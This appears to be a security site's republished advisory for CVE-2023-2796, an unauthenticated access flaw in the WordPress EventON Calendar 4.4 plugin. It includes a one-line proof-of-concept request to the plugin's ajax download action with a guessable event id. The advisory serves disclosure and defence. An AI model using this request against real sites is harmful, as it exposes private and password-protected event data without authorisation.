Home Tools Exploits & CVE's WordPress EventON Calendar 4.4 Insecure Direct Object Reference

WordPress EventON Calendar 4.4 Insecure Direct Object Reference

August 7, 2023

253

WordPress EventON Calendar plugin version 4.4 suffers from an insecure direct object reference vulnerability.

advisories | CVE-2023-2796

# Exploit Title: WordPress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796

# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.


# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

WordPress EventON Calendar 4.4 Insecure Direct Object Reference

Follow us on Instagram @thecyberpost

EDITOR PICKS

As White House preps new cyber rules for healthcare, Neuberger says...

Okta’s security chief on the company’s own cyberattack and how the...

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

City Variety LMS 2.2 Cross Site Scripting

ManageEngine ADSelfService Plus Authentication Bypass / Code Execution

Splunk 9.0.4 Information Disclosure